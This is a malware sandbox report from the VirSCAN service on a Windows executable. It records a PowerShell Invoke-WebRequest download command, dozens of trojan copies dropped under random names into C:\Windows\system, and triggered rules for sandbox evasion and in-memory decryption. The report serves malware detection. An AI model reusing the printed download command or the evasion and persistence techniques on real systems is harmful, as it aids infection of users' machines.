VirSCAN

1, You can UPLOAD any files, but there is a 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but the archive must contain fewer than 20 files.
3, VirSCAN can scan compressed files protected with the password 'infected' or 'virus'.
4, If your browser cannot upload files, please download the VirSCAN uploader to upload.

Basic Information

file name: 00红星照耀中国
file size: 1826921
file type: application/x-dosexec
MD5: a30857d70249243b7faeb9a1d831145e
sha1: a020a89a47015d0309b51b3433d2b98b05228b4a

CreateProcess

ApplicationName:
CmdLine: powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
childid: 3016
childname: powershell.exe
childpath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
drop_type:
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\xHHrwsJ.exe
childid: 2928
childname: xHHrwsJ.exe
childpath: C:\Windows\system\xHHrwsJ.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\UfmkLek.exe
childid: 2000
childname: UfmkLek.exe
childpath: C:\Windows\system\UfmkLek.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\MaprHdx.exe
childid: 2208
childname: MaprHdx.exe
childpath: C:\Windows\system\MaprHdx.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\JPzdVyd.exe
childid: 940
childname: JPzdVyd.exe
childpath: C:\Windows\system\JPzdVyd.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\KdggEVI.exe
childid: 2528
childname: KdggEVI.exe
childpath: C:\Windows\system\KdggEVI.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\VwdfFJt.exe
childid: 952
childname: VwdfFJt.exe
childpath: C:\Windows\system\VwdfFJt.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\CRcNZVo.exe
childid: 2596
childname: CRcNZVo.exe
childpath: C:\Windows\system\CRcNZVo.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\IXUptjB.exe
childid: 568
childname: IXUptjB.exe
childpath: C:\Windows\system\IXUptjB.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\pIzHgOO.exe
childid: 3024
childname: pIzHgOO.exe
childpath: C:\Windows\system\pIzHgOO.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\uMjqrEB.exe
childid: 3044
childname: uMjqrEB.exe
childpath: C:\Windows\system\uMjqrEB.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\sEgtnBe.exe
childid: 1876
childname: sEgtnBe.exe
childpath: C:\Windows\system\sEgtnBe.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\yZCFVGB.exe
childid: 2888
childname: yZCFVGB.exe
childpath: C:\Windows\system\yZCFVGB.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\ExdKeaE.exe
childid: 2200
childname: ExdKeaE.exe
childpath: C:\Windows\system\ExdKeaE.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\bcPoyuc.exe
childid: 256
childname: bcPoyuc.exe
childpath: C:\Windows\system\bcPoyuc.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\iBJwesG.exe
childid: 1964
childname: iBJwesG.exe
childpath: C:\Windows\system\iBJwesG.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\MOSoBow.exe
childid: 2892
childname: MOSoBow.exe
childpath: C:\Windows\system\MOSoBow.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\IhAbDZN.exe
childid: 2204
childname: IhAbDZN.exe
childpath: C:\Windows\system\IhAbDZN.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\tBgBbnQ.exe
childid: 1512
childname: tBgBbnQ.exe
childpath: C:\Windows\system\tBgBbnQ.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\HvsZicl.exe
childid: 2868
childname: HvsZicl.exe
childpath: C:\Windows\system\HvsZicl.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\iQKkOox.exe
childid: 2808
childname: iQKkOox.exe
childpath: C:\Windows\system\iQKkOox.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\XEOFqKg.exe
childid: 676
childname: XEOFqKg.exe
childpath: C:\Windows\system\XEOFqKg.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\NJPyHCi.exe
childid: 2592
childname: NJPyHCi.exe
childpath: C:\Windows\system\NJPyHCi.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\gfRmnmy.exe
childid: 1932
childname: gfRmnmy.exe
childpath: C:\Windows\system\gfRmnmy.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\CAMmSlI.exe
childid: 3052
childname: CAMmSlI.exe
childpath: C:\Windows\system\CAMmSlI.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\pdXNVaf.exe
childid: 2732
childname: pdXNVaf.exe
childpath: C:\Windows\system\pdXNVaf.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine: C:\Windows\System\tSxAjyb.exe
childid: 2552
childname: tSxAjyb.exe
childpath: C:\Windows\system\tSxAjyb.exe
drop_type: 1
name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
noNeedLine:
path: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
pid: 1316
ApplicationName:
CmdLine:
childid: 1316
childname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
childpath: C:\Users\Administrator\AppData\Local\Temp\1618729205843_a30857d70249243b7faeb9a1d831145e.exe
drop_type:
name:
noNeedLine:
path:
pid: 2880

Summary

buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 3016
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Local Settings\MuiCache\3A\AAF68885\LanguageList

Behavior_analysis

message: Attempts to evade sandbox detection by sleeping for a long time
name: Long sleep
szSubkey:
score: 2

Dropped_Save

analysis_result: safe
create: 0
how: move
md5: 32f22388bd9ac27fe3221fd005f7f1bd
name: 590aee7bdd69b59b.customDestinations-ms
new_size: 7960bytes
operation: copy and overwrite file
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
processid: 3016
processname: powershell.exe
sha1: dbaf27ce87620638a1211457ba71c6ae3cfb90f2
sha256: 02c356d71431699d769ab2d6d319682077a6b2e4318bdf3bfb32d29bbbb9d6d1
size: 7960
this_path: /data/cuckoo/storage/analyses/6000053/files/1016/590aee7bdd69b59b.customDestinations-ms
type: data

Dropped Unsave

analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 2f1eabe32e9fc5c5aafd07fc8d5a19fe
name: xHHrwsJ.exe
new_size: 1784KB (1826921bytes)
operation: modify file
path: C:\Windows\system\xHHrwsJ.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 50d6c88e10f53d2aad303da9c289e9fb0b8bd0a0
sha256: b755bf757157b624ebf6ff20c0f7c5bbf7c505d682b6ed4dc943a7d689c554a6
size: 1826921
this_path: /data/cuckoo/storage/analyses/6000053/files/1000/xHHrwsJ.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 0705e683b880a4b0fbc2d07299308381
name: UfmkLek.exe
new_size: 1784KB (1827174bytes)
operation: modify file
path: C:\Windows\system\UfmkLek.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 2aebd67e833c2ca39dd53e9a4a5e2bf9b3ac344d
sha256: 4bfba276d9602ecf479a26555b766fc8c8f9e5e089ba236aab373819c495301a
size: 1827174
this_path: /data/cuckoo/storage/analyses/6000053/files/1001/UfmkLek.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 690681b8c58823b453aef30245100acf
name: MaprHdx.exe
new_size: 1784KB (1827427bytes)
operation: modify file
path: C:\Windows\system\MaprHdx.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 6b3e03071afb9818b80b81db2d95bf283e39d2a8
sha256: e24e97b04f7651d3a2f15e7cbe95b30d208570e861a33ac94c7056fdd192ad61
size: 1827427
this_path: /data/cuckoo/storage/analyses/6000053/files/1002/MaprHdx.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: b801682b75a03291ace364222f2a63ea
name: JPzdVyd.exe
new_size: 1784KB (1827680bytes)
operation: modify file
path: C:\Windows\system\JPzdVyd.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: fd59450eea44e393d0619672bfb9d79cfc6dd304
sha256: 7df0a689569029c74adf9ee2c5163cdf9d6d52c947a36f9655590b13ffcf0efd
size: 1827680
this_path: /data/cuckoo/storage/analyses/6000053/files/1003/JPzdVyd.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 81c73c29a62f33f74babbe9f3f348d57
name: KdggEVI.exe
new_size: 1785KB (1827933bytes)
operation: modify file
path: C:\Windows\system\KdggEVI.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 4955ebee44d7aaabc8917879df6acbdef249089c
sha256: 0582672c14409c3eb593d0d287309f04faaaf0e1c78887e29a11f0f20cdc62c3
size: 1827933
this_path: /data/cuckoo/storage/analyses/6000053/files/1004/KdggEVI.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: ef43983438ef9d836e34f28ca311779f
name: VwdfFJt.exe
new_size: 1785KB (1828186bytes)
operation: modify file
path: C:\Windows\system\VwdfFJt.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: a951de2d9fd51db2a74e919dfd18418053f37dc9
sha256: 5f50a731e05a7f45152cbc56dcc47a23d43891fb27614c1ede0dd45e4c9c7064
size: 1828186
this_path: /data/cuckoo/storage/analyses/6000053/files/1005/VwdfFJt.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: cf9feadf79474d3da841e9aec691aa35
name: CRcNZVo.exe
new_size: 1785KB (1828439bytes)
operation: modify file
path: C:\Windows\system\CRcNZVo.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: abbf5e1dbcb3ebdd255b75451f029bc9e2346ef4
sha256: 783b169cfeaa7d31488aafd6b357af8996ef67a3506254b46b34e462013abb65
size: 1828439
this_path: /data/cuckoo/storage/analyses/6000053/files/1006/CRcNZVo.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 80541ee72db7f89fc1ee06c183ba14ac
name: IXUptjB.exe
new_size: 1785KB (1828692bytes)
operation: modify file
path: C:\Windows\system\IXUptjB.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 5bed1a09ab0eb61019c9616e63dfa1d999729519
sha256: ec3bc8b06e25baae7cf3624eb96ad284a1dc749d56e4542ac895f6daa1c60491
size: 1828692
this_path: /data/cuckoo/storage/analyses/6000053/files/1007/IXUptjB.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 85e7bd70e23f1cde06266c4ddb0ea446
name: pIzHgOO.exe
new_size: 1786KB (1828945bytes)
operation: modify file
path: C:\Windows\system\pIzHgOO.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 2bea1c6db2343cc4cc3a4b9fca0ee324c39b0af7
sha256: 6814db2b3d846b506449a0532808ac50018488cfb0245b5f73adac13b3f42139
size: 1828945
this_path: /data/cuckoo/storage/analyses/6000053/files/1008/pIzHgOO.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: bc56c59e41a00de77207802325ad1b5d
name: uMjqrEB.exe
new_size: 1786KB (1829198bytes)
operation: modify file
path: C:\Windows\system\uMjqrEB.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 7dd875cca55571a7ed842f967f29f2b611879b74
sha256: 975ef5ef27a53089354300cce80999c4305a207669cd404941370f47e2e66e2a
size: 1829198
this_path: /data/cuckoo/storage/analyses/6000053/files/1009/uMjqrEB.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 98b32e38d2d27d6307a9bcd96bac5d00
name: sEgtnBe.exe
new_size: 1786KB (1829451bytes)
operation: modify file
path: C:\Windows\system\sEgtnBe.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 92d7fd7a3e9c240ac1e48ee2d8c3fc70d5c4e332
sha256: 655f76b6923a8345053a9b825ba7d8112e5891a821050bbcb087dd1d95305f2b
size: 1829451
this_path: /data/cuckoo/storage/analyses/6000053/files/1010/sEgtnBe.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: d650af0fd8364b27eca706382416b294
name: yZCFVGB.exe
new_size: 1786KB (1829704bytes)
operation: modify file
path: C:\Windows\system\yZCFVGB.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: c18c3be99214d50a48c479445c5117580d5ffa9a
sha256: 95200f091939139b664a475f0c3da5d961535d1807c0b12e50fbe91618017965
size: 1829704
this_path: /data/cuckoo/storage/analyses/6000053/files/1011/yZCFVGB.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 10092d283b62947fb55cc5aec3230a6f
name: ExdKeaE.exe
new_size: 1787KB (1829957bytes)
operation: modify file
path: C:\Windows\system\ExdKeaE.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: ca1194a3b9a0f5c3bb5d5b54076f9481359f589e
sha256: 6954713a53dc8474204c2266cf5da48547d3bfdd1529591c9fad32944ad91f5f
size: 1829957
this_path: /data/cuckoo/storage/analyses/6000053/files/1012/ExdKeaE.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: df9119a34f2f5430d95b4f981d7cb8f3
name: bcPoyuc.exe
new_size: 1787KB (1830210bytes)
operation: modify file
path: C:\Windows\system\bcPoyuc.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 038b467b326eabd4bb1a35bbc1635fef531a86e9
sha256: 6d192b1e27dfa17c696609bd142e2bc8b2350a66354c0c0224ea65a335c02f03
size: 1830210
this_path: /data/cuckoo/storage/analyses/6000053/files/1013/bcPoyuc.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 18c5ea80694f1eb4f75b7f85a3c0c2b2
name: iBJwesG.exe
new_size: 1787KB (1830463bytes)
operation: Modify file
path: C:\Windows\system\iBJwesG.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 716c4b7a4c36d99dce67c0fc253599b322d6466c
sha256: 741ae2a4e36de8b8da546c6ab26ac3fc71f636459008ec8002836043c44f684f
size: 1830463
this_path: /data/cuckoo/storage/analyses/6000053/files/1014/iBJwesG.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 34a15ecb28ac49d4713eeeec820de68b
name: MOSoBow.exe
new_size: 1787KB (1830716bytes)
operation: Modify file
path: C:\Windows\system\MOSoBow.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 452c4743ca2f931fb12aa3fd026c77a23688e3da
sha256: 3c8a72330157b832ec3f5b12d738182f36c033f849d54272c07d0b6e90b5bc88
size: 1830716
this_path: /data/cuckoo/storage/analyses/6000053/files/1015/MOSoBow.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: ddaf374e60cce81fd1dc2c5fa54d90fe
name: IhAbDZN.exe
new_size: 1788KB (1830969bytes)
operation: Modify file
path: C:\Windows\system\IhAbDZN.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 599abf04670c2d114bb673844798cd3a25d4b6e6
sha256: f8a10e74ea6c425b35aaca21595bc9671db91953b8df6df145981a2d3f4894c2
size: 1830969
this_path: /data/cuckoo/storage/analyses/6000053/files/1017/IhAbDZN.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: a209bf22f3b9843c494565e9fb621857
name: tBgBbnQ.exe
new_size: 1788KB (1831222bytes)
operation: Modify file
path: C:\Windows\system\tBgBbnQ.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 300f255cc10c2027f96bb78bb917bce1d745162b
sha256: 2fabe4ea9a6d82743c9b207c98cad353355a6499ae0467d3b394288f54bac458
size: 1831222
this_path: /data/cuckoo/storage/analyses/6000053/files/1018/tBgBbnQ.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 4a22faa5425ab42f240b2f5fa76ebaec
name: HvsZicl.exe
new_size: 1788KB (1831475bytes)
operation: Modify file
path: C:\Windows\system\HvsZicl.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 977ad5c3eca52771219dc7e8c5e4ed79cef27d9e
sha256: c247096e7977ad8a6359525d954397602fd250d3054ab419b54e8078b3dae458
size: 1831475
this_path: /data/cuckoo/storage/analyses/6000053/files/1019/HvsZicl.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: e3f92a44fff344c99db172da62bba356
name: iQKkOox.exe
new_size: 1788KB (1831728bytes)
operation: Modify file
path: C:\Windows\system\iQKkOox.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 685ed3288f0d699e1b6fb7586ed5153258b849b0
sha256: 7b09267607e9c7b7cb510d5275ab8dd5b09eb7e4f95e312204501e2e7e429f07
size: 1831728
this_path: /data/cuckoo/storage/analyses/6000053/files/1020/iQKkOox.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 2a1b28a37cb077f217858953c910cb29
name: XEOFqKg.exe
new_size: 1789KB (1831981bytes)
operation: Modify file
path: C:\Windows\system\XEOFqKg.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: af9aa13f3bbf2c4dcf234b33e853d6b44f763f3c
sha256: fbb4b0a3c3de767baaa291e29b4521431d0e87eb5e5fcd8a1ab956ab59e33887
size: 1831981
this_path: /data/cuckoo/storage/analyses/6000053/files/1021/XEOFqKg.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 6b5d350f50e8d849b5d50012a7289980
name: NJPyHCi.exe
new_size: 1789KB (1832234bytes)
operation: Modify file
path: C:\Windows\system\NJPyHCi.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 4bdafaa29ee61a81ea3fbfd3caf417fc8609c5f4
sha256: 594acbf65c4cda8b6e69d303a79851b7d50b057aaa12a371627721b5b7064d01
size: 1832234
this_path: /data/cuckoo/storage/analyses/6000053/files/1022/NJPyHCi.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 3ce75d3ff8065f7de4b42d5b9e6b40d5
name: gfRmnmy.exe
new_size: 1789KB (1832487bytes)
operation: Modify file
path: C:\Windows\system\gfRmnmy.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 84a2531ac17710520fd8012fe2f62fde8f163b9f
sha256: 5ff821868aa70337260e89bc410bdc1cdf5ac442fd1f4c02885f1bfa472ddc96
size: 1832487
this_path: /data/cuckoo/storage/analyses/6000053/files/1023/gfRmnmy.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 4473f3dd1c4e5dc176bcd4dca12c2da7
name: CAMmSlI.exe
new_size: 1789KB (1832740bytes)
operation: Modify file
path: C:\Windows\system\CAMmSlI.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 8da59cf54a9671e65b61d6faf46df2b58689ae2d
sha256: ccba5da8b5c276100095678eee93667a5eaef5aa1dd5c9947bcdf0f223243821
size: 1832740
this_path: /data/cuckoo/storage/analyses/6000053/files/1024/CAMmSlI.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: c3ae93f1fe89feb07f77647a122414ba
name: pdXNVaf.exe
new_size: 1790KB (1832993bytes)
operation: Modify file
path: C:\Windows\system\pdXNVaf.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 989965412ecc9e94381968199b33ea78d5f9f89b
sha256: 6f3126cc547f0adc07f11f844269fd54fb56ca0fec46180b070b7764c64dbfe4
size: 1832993
this_path: /data/cuckoo/storage/analyses/6000053/files/1025/pdXNVaf.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 6d74305a72ffd9373302f7695f3e2576
name: tSxAjyb.exe
new_size: 1790KB (1833246bytes)
operation: Modify file
path: C:\Windows\system\tSxAjyb.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: 763c7965209edb0b4448501fc500b0bcd0c10e49
sha256: 56456f6d6b3f83fb48abdc96a9d12640d9e4f8ca4fefa9ef3633fea88778df83
size: 1833246
this_path: /data/cuckoo/storage/analyses/6000053/files/1026/tSxAjyb.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 71109a01de60f9b2f61f2ef1d022d9dd
name: nbDdSOs.exe
new_size: 1790KB (1833499bytes)
operation: Modify file
path: C:\Windows\system\nbDdSOs.exe
processid: 1316
processname: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
sha1: bcfe78e80dd950fe84be3ad2d5d638e1884c27af
sha256: ee2e68bba1fa33e6d50decf08a463a956f7cb2fea930672369417b208d537067
size: 1833499
this_path: /data/cuckoo/storage/analyses/6000053/files/1027/nbDdSOs.exe
type: PE32+ executable (console) x86-64, for MS Windows

Malicious

attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1316
process_name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Defense Evasion
level: 2
matchedinfo: Malicious program copies files into the system directory in order to hide the malicious files
num: 396
process_id: 1316
process_name: 1618729205843_a30857d70249243b7faeb9a1d831145e.exe
rulename: Copy file to system directory
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Generally used for file encryption or encrypted data transfer, and may be used by ransomware
num: 5337
process_id: 3016
process_name: powershell.exe
rulename: Call cryptographic algorithm library
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 5526
process_id: 3016
process_name: powershell.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 2
matchedinfo: Malicious program releases a resource from its resource section into memory and decrypts it
num: 6287
process_id: 3016
process_name: powershell.exe
rulename: Load resource into memory
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Malware modifies memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2928
process_name: xHHrwsJ.exe
rulename: Modify memory region to readable, writable and executable
attck_tactics: Other malicious behavior
level: 1
